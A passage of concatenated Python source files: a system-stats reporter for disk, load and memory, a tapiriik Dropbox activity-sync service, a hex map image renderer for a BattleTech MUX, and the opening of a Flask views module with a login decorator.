st.append(' %s: %s' % (datum, disk_info[datum]))
st.append('')
if disks:
st.pop()
else:
for mount in sorted(disks):
disk_info = disks[mount]
st.append('%s\tsize=%s used=%s available=%s capacity=%s' % (
mount, disk_info['size'], disk_info['used'],
disk_info['available'], disk_info['capacity']))
return '\n'.join(st)
def cpu_load_str(self):
"""Return CPU load average information as string."""
title = 'CPU Load Average:'
st = [title]
st.append('-'*len(title))
load_stats = self.cpu_load()
st.append('last one minute: %s' % load_stats['one'])
st.append('last five minutes: %s' % load_stats['five'])
st.append('last fifteen minutes: %s' % load_stats['fifteen'])
return '\n'.join(st)
def memory_usage_str(self):
"""Return memory usage information as string."""
title = 'Memory usage:'
st = [title]
st.append('-'*len(title))
mem_info = self.memory_usage()
for mem_type in ('total', 'available', 'used', 'free', 'swap_total',
'swapped'):
st.append('%s: %s' % (mem_type, mem_info.get(mem_type, 'n/a')))
return '\n'.join(st)
def logical_cpu_count_str(self):
title = 'Logical CPU Count:'
st = [title]
st.append('-'*len(title))
st.append(str(self.logical_cpu_count()))
return '\n'.join(st)
def uptime(self):
"""Return uptime info dictionary."""
up, load = self._uptime_load()
return up
def cpu_load(self):
"""Return CPU load information dictionary."""
up, load = self._uptime_load()
return load
def disk_usage(self):
"""Return disk usage dictionary.
The top-level disk-usage dictionary has keys consisting of each
mount point on the file sysem and values consisting of a dictionary of
information pertaining to that mount point.
Each mount point dictionary containing the following keys: partition,
size, used, available, capacity. Each value is a string describing
the corresponding data.
"""
now = int(time.time())
if now - self._last_disk < STATS_TTL:
return self._disk_stats
proc = subprocess.Popen(('df', '-P'), stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
df = out.decode('utf-8').strip().split('\n')
block_size = int(df[0].split()[1].split('-')[0])
ds = {}
for l in df[1:]:
part, size_bks, used_bks, avail_bks, cap, mount = l.split()[:6]
size = int(size_bks) * block_size
used = int(used_bks) * block_size
avail = int(avail_bks) * block_size
info = {'partition': part, 'capacity': cap}
ds[mount] = info
if self._show_bytes:
# Show absolute bytes as well as short size value.
info['size'] = '%s (%s)' % (size, size_str(size))
info['used'] = '%s (%s)' % (used, size_str(used))
info['available'] = '%s (%s)' % (
avail, size_str(avail))
else:
# Do not show absolute bytes in size values.
info['size'] = size_str(size)
info['used'] = size_str(used)
info['available'] = size_str(avail)
self._last_disk = now
self._disk_stats = ds
return ds
def memory_usage(self):
"""Return memory usage information dictionary.
The dictionary returned has the following keys: free, used, total,
swapped, swap_total, available. Each value is a string specifying the
associated value.
"""
now = int(time.time())
if now - self._last_mem < STATS_TTL:
return self._mem_stats
if platform.system() == 'Linux':
mem_stats = self._linux_mem()
elif platform.system() == 'FreeBSD':
mem_stats = self._freebsd_mem()
else:
na = 'n/a'
mem_stats = {'free': na, 'used': na, 'total': na, 'swapped': na,
'swap_total': na, 'available': na}
self._last_mem = now
self._mem_stats = mem_stats
return mem_stats
def logical_cpu_count(self):
cores = 0
if platform.system() == 'Linux':
cpu_path = '/dev/cpu'
if os.path.exists(cpu_path):
for dirent in os.listdir(cpu_path):
if dirent.isdigit():
cores += 1
elif platform.system() == 'FreeBSD':
ncpu = subprocess.check_output(
['sysctl', '-a', 'hw.ncpu']).decode('utf-8')
cores = int(ncpu.split(':')[-1].strip())
else:
return 1
return cores
def _uptime_load(self):
# If not enough time has elapsed, then do not update stats.
now = int(time.time())
if now - SystemStats._last_uptime < STATS_TTL:
return SystemStats._uptime, SystemStats._load
SystemStats._last_uptime = now
not_nums = string.whitespace+string.ascii_letters+string.punctuation
uptime = subprocess.check_output('uptime').decode('utf-8')
ut = uptime.split(',')
days = ut[0]
if days.find('day') == -1:
idx = days.find('up')
duration = days[idx + 3:]
days = 0
else:
days_idx = days.find('up')
days = days[days_idx + 3:].strip(not_nums)
duration = ut[1]
duration = duration.strip(not_nums)
if ':' in duration:
hours, minutes = duration.split(':')
else:
hours = 0
minutes = duration
u = {'days': int(days), 'hours': int(hours), 'minutes': int(minutes)}
one, five, fifteen = uptime.strip(',').rsplit(None, 3)[-3:]
l = {'one': float(one.rstrip(',')),
'five': float(five.rstrip(',')),
'fifteen': float(fifteen.rstrip(','))}
SystemStats._uptime = u
SystemStats._load = l
return u, l
def _linux_mem(self):
"""Get the available memory for a linux system.
This is done by reading /proc/meminfo
"""
meminfo = {}
def convert_mem(label):
mem, units = meminfo[label].split()
if units == 'kB':
mem = int(mem) * 1024
elif units == 'mB':
mem = int(mem) * 1024 * 1024
else:
mem = int(mem)
return mem
mem_free = mem_used = mem_total = mem_avail = 'n/a'
swapped = swap_total = 'n/a'
if os.path.exists('/proc/meminfo'):
try:
with open('/proc/meminfo') as file_meminfo:
meminfo_data = file_meminfo.read()
for l in meminfo_data.split("\n"):
if ':' not in l:
continue
k, v = l.split(':', 1)
meminfo[k] = v.strip()
mem_total = convert_mem('MemTotal')
mem_free = convert_mem('MemFree')
mem_buffers = convert_mem('Buffers')
mem_cached = convert_mem('Cached')
#mem_inactive = convert_mem('Inactive')
swapped = convert_mem('SwapCached')
swap_total = convert_mem('SwapTotal')
# determine logical summary information
#mem_avail = mem_inactive + mem_cached + mem_free
mem_avail = mem_buffers + mem_cached + mem_free
mem_used = mem_total - mem_avail
if self._show_bytes:
mem_free = '%d (%s)' % (mem_free,
size_str(mem_free))
mem_total = '%d (%s)' % (mem_total,
size_str(mem_total))
mem_avail = '%d (%s)' % (mem_avail,
size_str(mem_avail))
mem_used = '%d (%s)' % (mem_used,
size_str(mem_used))
swapped = '%d (%s)' % (swapped,
size_str(swapped))
swap_total = '%d (%s)' % (swap_total,
size_str(swap_total))
else:
mem_free = size_str(mem_free)
mem_total = size_str(mem_total)
mem_avail = size_str(mem_avail)
mem_used = size_str(mem_used)
swapped = size_str(swapped)
swap_total = size_str(swap_total)
except Exception:
pass
return {'free': mem_free, 'used': mem_used, 'total': mem_total,
'swapped': swapped, 'swap_total': swap_total,
'available': mem_avail}
def _freebsd_mem(self):
"""Get the available memory for a FreeBSD system.
This is done by reading information from sysctl.
"""
mem_free = mem_used = mem_total = mem_avail = 'n/a'
swapped = swap_total = 'n/a'
try:
sysctl = {}
out = subprocess.check_output(
('/sbin/sysctl', '-a')).decode('utf-8').strip()
for l in out.split('\n'):
if ':' not in l:
continue
k, v = l.split(':', 1)
sysctl[k] = v
def mem_rounded(mem_size):
chip_size = 1
chip_guess = (mem_size // 8) - 1
while (chip_guess):
chip_guess >>= 1
chip_size <<= 1
return ((mem_size // chip_size) + 1) * chip_size
mem_phys = int(sysctl['hw.physmem'])
page_size = int(sysctl['hw.pagesize'])
mem_hw = mem_rounded(mem_phys)
#mem_all = (int(sysctl['vm.stats.vm.v_page_count']) * page_size)
#mem_wire = (int(sysctl['vm.stats.vm.v_wire_count']) * page_size)
#mem_active= (int(sysctl['vm.stats.vm.v_active_count'])* page_size)
mem_inactive = (int(sysctl['vm.stats.vm.v_inactive_count']) *
page_size)
mem_cache = (int(sysctl['vm.stats.vm.v_cache_count']) * page_size)
mem_free = (int(sysctl['vm.stats.vm.v_free_count']) * page_size)
swap_total = int(sysctl['vm.swap_total'])
swapped = int(sysctl['vm.stats.vm.v_swappgsout'])
# determine logical summary information
mem_total = mem_hw
mem_avail = mem_inactive + mem_cache + mem_free
mem_used = mem_total - mem_avail
if self._show_bytes:
mem_free = '%d (%s)' % (mem_free,
size_str(mem_free))
mem_total = '%d (%s)' % (mem_total,
size_str(mem_total))
mem_avail = '%d (%s)' % (mem_avail,
size_str(mem_avail))
mem_used = '%d (%s)' % (mem_used,
size_str(mem_used))
swapped = '%d (%s)' % (swapped, size_str(swapped))
swap_total = '%d (%s)' % (swap_total,
size_str(swap_total))
else:
mem_free = size_str(mem_free)
mem_total = size_str(mem_total)
mem_avail = size_str(mem_avail)
mem_used = size_str(mem_used)
swapped = size_str(swapped)
swap_total = size_str(swap_total)
except Exception:
pass
return {'free': mem_free, 'used': mem_used, 'total': mem_total,
'swapped': swapped, 'swap_total': swap_total,
'available': mem_avail}
def size_str(byte_size):
"""Truncate number to highest significant power of 2 and add suffix."""
KB = 1024
MB = KB*1024
GB = MB*1024
if byte_size > GB:
return str(round(float(byte_size) / GB, 1)) + 'G'
if byte_size > MB:
return str(round(float(byte_size) / MB, 1)) + 'M'
if byte_size > KB:
return str(round(float(byte_size) / KB, 1)) + 'K'
return str(byte_size)
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser(description='Show system information')
ap.add_argument('--verbose', '-v', action='store_true',
help='Show verbose output.')
args = ap.parse_args()
# This module can be run alone to output stats info for the local system.
if args.verbose:
print(SystemStats(True, True))
else:
print(SystemStats(False, False))
| |
from datetime import datetime, timedelta
from django.core.urlresolvers import reverse
from tapiriik.database import cachedb
from tapiriik.services.api import APIException, ServiceExceptionScope, UserException, UserExceptionType, APIExcludeActivity, ServiceException
from tapiriik.services.exception_tools import strip_context
from tapiriik.services.gpx import GPXIO
from tapiriik.services.interchange import ActivityType, UploadedActivity
from tapiriik.services.service_base import ServiceAuthenticationType, ServiceBase
from tapiriik.services.tcx import TCXIO
from tapiriik.settings import WEB_ROOT, DROPBOX_APP_KEY, DROPBOX_APP_SECRET, DROPBOX_FULL_APP_KEY, DROPBOX_FULL_APP_SECRET
import bson
import dropbox
import json
import logging
import lxml
import pickle
import re
import requests
logger = logging.getLogger(__name__)
class DropboxService(ServiceBase):
ID = "dropbox"
DisplayName = "Dropbox"
DisplayAbbreviation = "DB"
AuthenticationType = ServiceAuthenticationType.OAuth
AuthenticationNoFrame = True # damn dropbox, spoiling my slick UI
Configurable = True
ReceivesStationaryActivities = False
ActivityTaggingTable = { # earlier items have precedence over
ActivityType.Running: "run(?!tastic)",
ActivityType.MountainBiking: "m(oun)?t(ai)?n\s*bik(e|ing)",
ActivityType.Cycling: "(cycl(e|ing)|bik(e|ing))",
ActivityType.Walking: "walk",
ActivityType.Hiking: "hik(e|ing)",
ActivityType.DownhillSkiing: "(downhill|down(hill)?\s*ski(ing)?)",
ActivityType.CrossCountrySkiing: "(xc|cross.*country)\s*ski(ing)?",
ActivityType.Snowboarding: "snowboard(ing)?",
ActivityType.Skating: "skat(e|ing)?",
ActivityType.Swimming: "swim",
ActivityType.Wheelchair: "wheelchair",
ActivityType.Rowing: "row",
ActivityType.Elliptical: "elliptical",
ActivityType.RollerSkiing: "rollerskiing",
ActivityType.StrengthTraining: "strength( ?training)?",
ActivityType.Gym: "(gym|workout)",
ActivityType.Climbing: "climb(ing)?",
ActivityType.StandUpPaddling: "(sup|stand( |-)/up ?paddl(e|ing))",
ActivityType.Other: "(other|unknown)"
}
ConfigurationDefaults = {"SyncRoot": "/", "UploadUntagged": False, "Format":"tcx", "Filename":"%Y-%m-%d_%H-%M-%S_#NAME_#TYPE"}
SupportsHR = SupportsCadence = True
SupportedActivities = ActivityTaggingTable.keys()
def _app_credentials(self, full):
if full:
return (DROPBOX_FULL_APP_KEY, DROPBOX_FULL_APP_SECRET)
else:
return (DROPBOX_APP_KEY, DROPBOX_APP_SECRET)
def _getClient(self, serviceRec):
from tapiriik.services import Service
if "Secret" in serviceRec.Authorization:
# Upgrade OAuth v1 token to v2.
# The new Python SDK has a method for this
# ...that requires initializing a client with a v2 user auth token :|
upgrade_data = {
"oauth1_token": serviceRec.Authorization["Key"],
"oauth1_token_secret": serviceRec.Authorization["Secret"]
}
res = requests.post("https://api.dropboxapi.com/2/auth/token/from_oauth1",
json=upgrade_data,
auth=self._app_credentials(serviceRec.Authorization["Full"]))
token = res.json()["oauth2_token"]
# Update service record.
Service.EnsureServiceRecordWithAuth(self, serviceRec.ExternalID, {
"Token": token,
"Full": serviceRec.Authorization["Full"]
})
else:
token = serviceRec.Authorization["Token"]
return dropbox.Dropbox(token)
def WebInit(self):
self.UserAuthorizationURL = reverse("oauth_redirect", kwargs={"service": "dropbox"})
def RequiresConfiguration(self, svcRec):
return svcRec.Authorization["Full"] and ("SyncRoot" not in svcRec.Config or not len(svcRec.Config["SyncRoot"]))
def _oauth2_flow(self, full, session):
app_credentials = self._app_credentials(full)
redirect_uri = WEB_ROOT + reverse("oauth_return",
kwargs={"service": "dropbox", "level": "full" if full else "normal"})
return dropbox.DropboxOAuth2Flow(
app_credentials[0], app_credentials[1], redirect_uri, session,
"dropbox-auth-csrf-token")
def GenerateUserAuthorizationURL(self, session, level=None):
return self._oauth2_flow(level == "full", session).start()
def RetrieveAuthorizationToken(self, req, level):
full = level == "full"
result = self._oauth2_flow(full, req.session).finish(req.GET)
uid = int(result.user_id)
return (uid, {"Token": result.access_token, "Full": full})
def RevokeAuthorization(self, serviceRecord):
pass # :(
def ConfigurationUpdating(self, svcRec, newConfig, oldConfig):
from tapiriik.sync import Sync
from tapiriik.auth import User
if newConfig["SyncRoot"] != oldConfig["SyncRoot"]:
Sync.ScheduleImmediateSync(User.AuthByService(svcRec), True)
cachedb.dropbox_cache.update({"ExternalID": svcRec.ExternalID}, {"$unset": {"Structure": None}})
def _raiseDbException(self, e):
if isinstance(e, dropbox.exceptions.AuthError):
raise APIException("Authorization error - %s" % e, block=True, user_exception=UserException(UserExceptionType.Authorization, intervention_required=True))
if isinstance(e, dropbox.exceptions.ApiError) and \
e.error.is_path() and \
e.error.get_path().reason.is_insufficient_space():
raise APIException("Dropbox quota error", block=True, user_exception=UserException(UserExceptionType.AccountFull, intervention_required=True))
raise APIException("API failure - %s" % e)
def _tagActivity(self, text):
for act, pattern in self.ActivityTaggingTable.items():
if re.search(pattern, text, re.IGNORECASE):
return act
return None
def _getActivity(self, serviceRecord, dbcl, path, base_activity=None):
try:
metadata, file = dbcl.files_download(path)
except dropbox.exceptions.DropboxException as e:
self._raiseDbException(e)
try:
if path.lower().endswith(".tcx"):
act = TCXIO.Parse(file.content, base_activity)
else:
act = GPXIO.Parse(file.content, base_activity)
except ValueError as e:
raise APIExcludeActivity("Invalid GPX/TCX " + str(e), activity_id=path, user_exception=UserException(UserExceptionType.Corrupt))
except lxml.etree.XMLSyntaxError as e:
raise APIExcludeActivity("LXML parse error " + str(e), activity_id=path, user_exception=UserException(UserExceptionType.Corrupt))
return act, metadata.rev
def DownloadActivityList(self, svcRec, exhaustive=False):
dbcl = self._getClient(svcRec)
if not svcRec.Authorization["Full"]:
syncRoot = "/"
else:
syncRoot = svcRec.Config["SyncRoot"]
# Dropbox API v2 doesn't like / as root.
if syncRoot == "/":
syncRoot = ""
# New Dropbox API prefers path_lower, it would seem.
syncRoot = syncRoot.lower()
# There used to be a massive affair going on here to cache the folder structure locally.
# Dropbox API 2.0 doesn't support the hashes I need for that.
# Oh well. Throw that data out now. Well, don't load it at all.
cache = cachedb.dropbox_cache.find_one({"ExternalID": svcRec.ExternalID}, {"ExternalID": True, "Activities": True})
if cache is None:
cache = {"ExternalID": svcRec.ExternalID, "Activities": {}}
try:
list_result = dbcl.files_list_folder(syncRoot, recursive=True)
except dropbox.exceptions.DropboxException as e:
self._raiseDbException(e)
def cache_writeback():
if "_id" in cache:
cachedb.dropbox_cache.save(cache)
else:
insert_result = cachedb.dropbox_cache.insert(cache)
cache["_id"] = insert_result.inserted_id
activities = []
exclusions = []
discovered_activity_cache_keys = set()
while True:
for entry in list_result.entries:
if not hasattr(entry, "rev"):
# Not a file -> we don't care.
continue
path = entry.path_lower
if not path.endswith(".gpx") and not path.endswith(".tcx"):
# Not an activity file -> we don't care.
continue
if svcRec.Authorization["Full"]:
relPath = path.replace(syncRoot, "", 1)
else:
relPath = path.replace("/Apps/tapiriik/", "", 1) # dropbox api is meh api
hashedRelPath = self._hash_path(relPath)
discovered_activity_cache_keys.add(hashedRelPath)
if hashedRelPath in cache["Activities"]:
existing = cache["Activities"][hashedRelPath]
else:
existing = None
if existing and existing["Rev"] == entry.rev:
# don't need entire activity loaded here, just UID
act = UploadedActivity()
act.UID = existing["UID"]
try:
act.StartTime = datetime.strptime(existing["StartTime"], "%H:%M:%S %d %m %Y %z")
except:
act.StartTime = datetime.strptime(existing["StartTime"], "%H:%M:%S %d %m %Y") # Exactly one user has managed to break %z :S
if "EndTime" in existing: # some cached activities may not have this, it is not essential
act.EndTime = datetime.strptime(existing["EndTime"], "%H:%M:%S %d %m %Y %z")
else:
logger.debug("Retrieving %s (%s)" % (path, "outdated meta cache" if existing else "not in meta cache"))
# get the full activity
try:
act, rev = self._getActivity(svcRec, dbcl, path)
except APIExcludeActivity as e:
logger.info("Encountered APIExcludeActivity %s" % str(e))
exclusions.append(strip_context(e))
continue
try:
act.EnsureTZ()
except:
pass # We tried.
act.Laps = [] # Yeah, I'll process the activity twice, but at this point CPU time is more plentiful than RAM.
cache["Activities"][hashedRelPath] = {"Rev": rev, "UID": act.UID, "StartTime": act.StartTime.strftime("%H:%M:%S %d %m %Y %z"), "EndTime": act.EndTime.strftime("%H:%M:%S %d %m %Y %z")}
# Incrementally update the cache db.
# Otherwise, if we crash later on in listing
# (due to OOM or similar), we'll never make progress on this account.
cache_writeback()
tagRes = self._tagActivity(relPath)
act.ServiceData = {"Path": path, "Tagged": tagRes is not None}
act.Type = tagRes if tagRes is not None else ActivityType.Other
logger.debug("Activity s/t %s" % act.StartTime)
activities.append(act)
# Perform pagination.
if list_result.has_more:
list_result = dbcl.files_list_folder_continue(list_result.cursor)
else:
break
# Drop deleted activities' records from cache.
all_activity_cache_keys = set(cache["Activities"].keys())
for deleted_key in all_activity_cache_keys - discovered_activity_cache_keys:
del cache["Activities"][deleted_key]
cache_writeback()
return activities, exclusions
def DownloadActivity(self, serviceRecord, activity):
# activity might not be populated at this point, still possible to bail out
if not activity.ServiceData["Tagged"]:
if not (hasattr(serviceRecord, "Config") and "UploadUntagged" in serviceRecord.Config and serviceRecord.Config["UploadUntagged"]):
raise APIExcludeActivity("Activity untagged", permanent=False, activity_id=activity.ServiceData["Path"], user_exception=UserException(UserExceptionType.Untagged))
path = activity.ServiceData["Path"]
dbcl = self._getClient(serviceRecord)
activity, rev = self._getActivity(serviceRecord, dbcl, path, base_activity=activity)
# Dropbox doesn't support stationary activities yet.
if activity.CountTotalWaypoints() <= 1:
raise APIExcludeActivity("Too few waypoints", activity_id=path, user_exception=UserException(UserExceptionType.Corrupt))
return activity
def _hash_path(self, path):
import hashlib
# Can't use the raw file path as a dict key in Mongo, since who knows what'll be in it (periods especially)
# Used the activity UID for the longest time, but that causes inefficiency when >1 file represents the same activity
# So, this:
csp = hashlib.new("md5")
csp.update(path.encode('utf-8'))
return csp.hexdigest()
def _clean_activity_name(self, name):
# https://www.dropbox.com/help/145/en
# Nothing outside BMP is allowed, either, apparently.
return re.sub("[@><:\"|?*]|[^\U00000000-\U0000d7ff\U0000e000-\U0000ffff]", "", re.sub("[/\\\]", "-", name))
def _format_file_name(self, format, activity):
name_pattern = re.compile("#NAME", re.IGNORECASE)
type_pattern = re.compile("#TYPE", re.IGNORECASE)
name = activity.StartTime.strftime(format)
name = name_pattern.sub(self._clean_activity_name(activity.Name) if activity.Name and len(activity.Name) > 0 and activity.Name.lower() != activity.Type.lower() else "", name)
name = type_pattern.sub(activity.Type, name)
name = re.sub(r"([\W_])\1+", r"\1", name) # To handle cases where the activity is unnamed
name = re.sub(r"^([\W_])|([\W_])$", "", name) # To deal with trailing-seperator weirdness (repeated seperator handled by prev regexp)
return name
def UploadActivity(self, serviceRecord, activity):
format = serviceRecord.GetConfiguration()["Format"]
if format == "tcx":
if "tcx" in activity.PrerenderedFormats:
logger.debug("Using prerendered TCX")
data = activity.PrerenderedFormats["tcx"]
else:
data = TCXIO.Dump(activity)
else:
if "gpx" in activity.PrerenderedFormats:
logger.debug("Using prerendered GPX")
data = activity.PrerenderedFormats["gpx"]
else:
data = GPXIO.Dump(activity)
dbcl = self._getClient(serviceRecord)
fname = self._format_file_name(serviceRecord.GetConfiguration()["Filename"], activity)[:250] + "." + format # DB has a max path component length of 255 chars, and we have to save for the file ext (4) and the leading slash (1)
if not serviceRecord.Authorization["Full"]:
fpath = "/" + fname
else:
fpath = serviceRecord.Config["SyncRoot"] + "/" + fname
try:
metadata = dbcl.files_upload(data.encode("UTF-8"), fpath, mode=dropbox.files.WriteMode.overwrite)
except dropbox.exceptions.DropboxException as e:
self._raiseDbException(e)
# Fake this in so we don't immediately redownload the activity next time 'round
cache = cachedb.dropbox_cache.find_one({"ExternalID": serviceRecord.ExternalID})
cache["Activities"][self._hash_path("/" + fname)] = {"Rev": metadata.rev, "UID": activity.UID, "StartTime": activity.StartTime.strftime("%H:%M:%S %d %m %Y %z"), "EndTime": activity.EndTime.strftime("%H:%M:%S %d %m %Y %z")}
cachedb.dropbox_cache.update({"ExternalID": serviceRecord.ExternalID}, cache) # not upsert, hope the record exists at this time...
return fpath
def DeleteCachedData(self, serviceRecord):
cachedb.dropbox_cache.remove({"ExternalID": serviceRecord.ExternalID})
| |
"""
Map image generation classes.
"""
import math
import logging
from PIL import Image, ImageDraw
from btmux_maplib.img_generator import rgb_vals
from btmux_maplib.img_generator.exceptions import InvalidImageMode
logger = logging.getLogger(__name__)
class MuxMapImage(object):
"""
This class serves as a base class for map image types. You generally only
need to over-ride render_hexes() to have something that works. See
PixelHexMapImage for an example.
DO NOT USE THIS CLASS DIRECTLY!
"""
# Reference to the MuxMap object to image.
map = None
# The PIL Image object.
map_img = None
# Imaging mode, see set_mode().
mode = "color"
# Show some debug information.
debug = True
# A lowercase list of valid imaging modes.
# color: Standard color terrain/elevation map.
# elevmap: Elevation only, looks grayscaled aside from water.
VALID_MODES = ["color", "elevmap"]
def __init__(self, map):
"""
Default init routine.
Args:
* map: (MuxMap) The map object to create an image of.
"""
self.map = map
def set_mode(self, mode):
mode_lower = mode.lower()
if mode_lower not in self.VALID_MODES:
raise InvalidImageMode(mode_lower)
else:
self.mode = mode_lower
logger.debug("Imaging mode set to: %s", self.mode)
def handle_resizing(self, min_dimension, max_dimension):
"""
Given a min and/or max dimension, calculate the overall re-size ratio
for the image and re-size if necessary. Return the scaling multiplier
used.
"""
map_width = float(self.map_img.size[0])
map_height = float(self.map_img.size[1])
resize_mul = 1.0
if min_dimension is not None and \
(map_width < min_dimension or map_height < min_dimension):
# Determine the smallest side to bring up to our limit.
smallest_dim = min(map_width, map_height)
# Bicubic gives the best look when scaling up.
resize_filter = Image.BICUBIC
resize_mul = float(min_dimension) / smallest_dim
logger.debug('Under-sized, re-size needed: (%d/%d) = %f',
min_dimension, smallest_dim, resize_mul)
self.resize_img(resize_mul, resize_filter)
elif max_dimension is not None and \
(map_width > max_dimension or map_height > max_dimension):
# Determine the largest side to bring down to our limit.
largest_dim = max(map_width, map_height)
# Anti-aliasing looks best when scaling down.
resize_filter = Image.ANTIALIAS
resize_mul = float(max_dimension) / largest_dim
logger.debug('Over-sized, re-size needed: (%d/%d) = %f',
max_dimension, largest_dim, resize_mul)
self.resize_img(resize_mul, resize_filter)
return resize_mul
def resize_img(self, resize_mul, resize_filter):
"""
Re-size the map image by a float value. 1.0 = 100%.
"""
map_width = self.map_img.size[0]
map_height = self.map_img.size[1]
logger.debug('Re-Size Mul: %f', resize_mul)
logger.debug('Before Width: %d Height: %d', map_width, map_height)
logger.debug('After Width: %d Height: %d',
map_width * resize_mul, map_height * resize_mul)
# Re-size the image with the appropriate size multiplier.
self.map_img = self.map_img.resize(
(int(map_width * resize_mul), int(map_height * resize_mul)),
resize_filter)
def render_hexes(self):
"""
Stub to alert people trying to use this class. MuxMapImage is not
meant to be used directly, and future sub-classes need a fall-through.
"""
raise NotImplementedError()
def generate_map(self, min_dimension=None, max_dimension=None):
"""
Generates a image from a map file, populates the object's map_img
attribute with a PIL Image.
min and max dimensions will scale the image if either the height or the
width goes above the max or under the min size in pixels. You may
specify one or both.
"""
self.map_img = Image.new("RGB", self.map.get_map_dimensions())
self.render_hexes()
# Do any re-sizing needed.
if min_dimension or max_dimension:
self.handle_resizing(min_dimension, max_dimension)
def get_terrain_rgb(self, terrain, elev):
"""
Looks up the correct RGB value tuple for a given terrain and elevation.
"""
if self.mode == "elevmap" and terrain != "~":
return rgb_vals.cmap["."][elev]
return rgb_vals.cmap[terrain][elev]
def show(self):
"""
Following PIL convention, show() opens your OS's image viewer for
the generated file. On Linux/Unix, this is typically xv, on Windows,
Windows Preview thing.
"""
self.map_img.show()
def save(self, filename, format="PNG"):
"""
Saves the current map file in the specified PIL-supported format.
"""
self.map_img.save(filename, format)
class PixelHexMapImage(MuxMapImage):
"""
Renders the map's hexes at a one hex per pixel ratio. This does not look
very good if zoomed or scaled in very far, but is fast and more natural
on larger maps at 100% or less scaling.
"""
def render_hexes(self):
"""
Over-rides the MuxMapImage stub routine to do our one pixel per hex
rendering.
"""
# Shortcuts for readability.
map_width = self.map.get_map_width()
map_height = self.map.get_map_height()
for y in range(0, map_height):
for x in range(0, map_width):
terrain = self.map.get_hex_terrain(x, y)
elev = self.map.get_hex_elevation(x, y)
rgb = self.get_terrain_rgb(terrain, elev)
self.map_img.putpixel((x, y), rgb)
class HexMapImage(MuxMapImage):
"""
Renders the map's hexes as hexes. This is a lot more computationally
expensive than PixelHexMapImage, but will produce more accurate results
when you're zoomed in.
"""
# Lower and upper hex line length. Everything else is calculated based
# on this number. This is best an even number.
hex_s = 10
# Distance between left edge and beginning of hex_s.
hex_h = int(round(math.sin(math.radians(30)) * hex_s))
# Distance between bounding box corners and the left and right middle bend
# points on the hex.
hex_r = int(round(math.cos(math.radians(30)) * hex_s))
# Total width of the hex
rect_b = hex_s + 2 * hex_h
# Total height of the hex
rect_a = 2 * hex_r
# Color to paint the lines
line_color = (255, 255, 255)
# These are populated by methods and are best left alone here.
img_width = None
img_height = None
draw = None
def __init__(self, map):
"""
Default init routine.
Args:
* map: (MuxMap) The map object to create an image of.
"""
super(HexMapImage, self).__init__(map)
# Calculate how much image area is needed to render all of the hexes.
self.img_width = self.map.get_map_width() * (self.rect_b - self.hex_h)
self.img_height = (self.map.get_map_height() - 1) * self.rect_a
def generate_map(self, min_dimension=None, max_dimension=None):
"""
Generates a image from a map file, populates the object's map_img
attribute with a PIL Image.
min and max dimensions will scale the image if either the height or the
width goes above the max or under the min size in pixels. You may
specify one or both.
"""
self.map_img = Image.new("RGB", (self.img_width, self.img_height))
logger.debug("Image created with dimensions: %dx%d",
self.map_img.size[0], self.map_img.size[1])
self.draw = ImageDraw.Draw(self.map_img)
self.render_hexes()
# Do any re-sizing needed.
if min_dimension or max_dimension:
self.handle_resizing(min_dimension, max_dimension)
def calc_upper_left_pixel(self, x, y):
"""
Calculates the upper left pixel of the box used to render a hex.
All of the hex's points are based on offsets of this point.
"""
# If this is an odd numbered hex, off-set it by half a hex height.
if x % 2 == 0:
# Even numbered row
y_pixel = (y * self.rect_a)
else:
# Odd numbered row
y_pixel = (y * self.rect_a - int(round(0.5 * self.rect_a)))
# The x-coordinate remains constaint regardless of odd or even.
x_pixel = x * (self.rect_b - self.hex_h)
return x_pixel, y_pixel
def draw_hex(self, x, y, terrain, elev):
"""
Draw the hex polygon.
"""
# The upper left pixel from which the hex is based on
upper_left = self.calc_upper_left_pixel(x, y)
# Upper and Lower left X coordinate
hex_s_start_x = upper_left[0] + self.hex_h
# Upper and Lower right X coordinate
hex_s_end_x = upper_left[0] + self.rect_b - self.hex_h
# Lower Y coordinate
hex_s_lower_y = upper_left[1] - self.rect_a
# X,Y tuples for top right and left points on the hex.
hex_uleft_xy = (hex_s_start_x, upper_left[1])
hex_uright_xy = (hex_s_end_x, upper_left[1])
# X,Y tuples for bottom right and left points on the hex.
hex_lleft_xy = (hex_s_start_x, hex_s_lower_y)
hex_lright_xy = (hex_s_end_x, hex_s_lower_y)
# X,Y tuple for the left and right middle bend points on the hex.
hex_left_bend_xy = (upper_left[0], upper_left[1] - self.hex_r)
hex_right_bend_xy = (upper_left[0] + self.rect_b, upper_left[1] - self.hex_r)
hex_point_list = [
hex_uleft_xy, hex_uright_xy,
hex_right_bend_xy,
hex_lright_xy, hex_lleft_xy,
hex_left_bend_xy
]
# Draw the filled hex polygon.
self.draw.polygon(
hex_point_list,
outline=self.line_color,
fill=self.get_terrain_rgb(terrain, elev))
def render_hexes(self):
"""
Over-rides the MuxMapImage stub routine to do our one pixel per hex
rendering.
"""
for y in range(0, self.map.get_map_width()):
for x in range(0, self.map.get_map_height()):
terrain = self.map.get_hex_terrain(x, y)
elev = self.map.get_hex_elevation(x, y)
self.draw_hex(x, y, terrain, elev)
| |
"""Contains Classes for different View Routes
Attributes:
url_rules (list): contains url rule objects, for add_url_rules() function
"""
import flask, flask.views
import functools
import config
import json
from nltk import word_tokenize
from nltk.corpus import stopwords
from hln.user import User
from hln import app
from hln import es
def login_required(method):
"""Checks Login status of user
Annotation method to check authorise url route.
Wraps a function using functools module
Args:
method (class bound method): get/post methods of different a url route class
Returns:
function: wrapper function
"""
@functools.wraps(method)
def wrapper(*args, **kwargs):
"""Wrapper function to check user login
Redirects user to /login/ url if user not in session,
else execute wrapped get/post method
Args:
*args: positional arguments
**kwargs: keyword arguments
Returns:
method/redirect output: wrapped method output or
"""
if 'username' in flask.session:
return method(*args, **kwargs)
else:
flask.flash("A login is required")
return flask.redirect(flask.url_for("login"))
return wrapper
def add_url_rules(url_rules):
"""Adds Flask Url Route Rules to Flask app (flask.Flask module)
Args:
url_rules (list): list of url object. Every object must have
required keys - 'url, class, view_name' and can have
optional key - 'methods' ('GET'/'POST')
Returns:
None
"""
for rule in url_rules:
if 'methods' not in rule:
rule['methods'] = ['GET']
app.add_url_rule(
rule['url'],
view_func=rule['class'].as_view(rule['view_name']),
methods=rule['methods']
)
class Home(flask.views.MethodView):
"""Base url route Class"""
@login_required
def get(self):
"""renders main dashboard
Returns:
None
"""
return flask.render_template("dashboard.html")
class Login(flask.views.MethodView):
"""Login url route Class"""
def get(self):
""" renders login page when user not in session,
redirects to home otherwise
